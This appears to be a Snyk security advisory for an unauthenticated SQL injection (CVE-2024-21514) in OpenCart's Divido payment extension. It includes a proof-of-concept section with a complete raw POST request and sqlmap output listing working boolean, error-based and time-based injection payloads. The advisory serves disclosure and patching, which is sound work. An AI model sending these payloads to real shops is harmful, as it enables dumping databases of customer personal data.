SQL Injection Affecting opencart/opencart package, versions <3.0.4.0
Threat Intelligence
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
The probability is the direct output of the EPSS model, and conveys an overall sense of the threat of exploitation in the wild. The percentile measures the EPSS probability relative to all known EPSS scores. Note: This data is updated daily, relying on the latest available EPSS model version. Check out the EPSS documentation for more details.
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk IDSNYK-PHP-OPENCARTOPENCART-7266565
- published21 Jun 2024
- disclosed21 Jun 2024
- creditCalum Hutton
Introduced: 21 Jun 2024
CVE-2024-21514 (opens in a new tab)How to fix?
Upgrade opencart/opencart to version 3.0.4.0 or higher.
Overview
opencart/opencart is a shopping cart system
Affected versions of this package are vulnerable to SQL Injection. An SQL Injection issue was identified in the Divido payment extension for OpenCart, which is included by default in version 3.0.3.9. As an anonymous unauthenticated user, if the Divido payment module is installed (it does not have to be enabled), it is possible to exploit SQL injection to gain unauthorised access to the backend database. For any site which is vulnerable, any unauthenticated user could exploit this to dump the entire OpenCart database, including customer PII data.
PoC
This can be exploited with a POST request to /index.php?route=extension/payment/divido/update which will delay the response for 5 seconds.
POST http://localhost/index.php?route=extension/payment/divido/update HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Connection: keep-alive Upgrade-Insecure-Requests: 1 Content-Type: application/json content-length: 44
{"status":true,"metadata":{"order_id":"1 AND (SELECT 6684 FROM (SELECT(SLEEP(5)))mUHr)"}}
Using this request in SQLmap it identified three different payload types:
python3 sqlmap.py -vv -r /tmp/oc2.raw --level 3 --risk 2 ... Parameter: JSON #1* ((custom) POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment) Payload: {"status":true,"metadata":{"order_id":"1 AND 7610=(SELECT (CASE WHEN (7610=7610) THEN 7610 ELSE (SELECT 7298 UNION SELECT 8143) END))-- -"}} Vector: AND [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))[GENERIC_SQL_COMMENT]Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: {"status":true,"metadata":{"order_id":"1 AND EXTRACTVALUE(2524,CONCAT(0x5c,0x716a7a6a71,(SELECT (ELT(2524=2524,1))),0x71716b7071))"}} Vector: AND EXTRACTVALUE([RANDNUM],CONCAT('','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))
Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: {"status":true,"metadata":{"order_id":"1 AND (SELECT 6684 FROM (SELECT(SLEEP(5)))mUHr)"}} Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])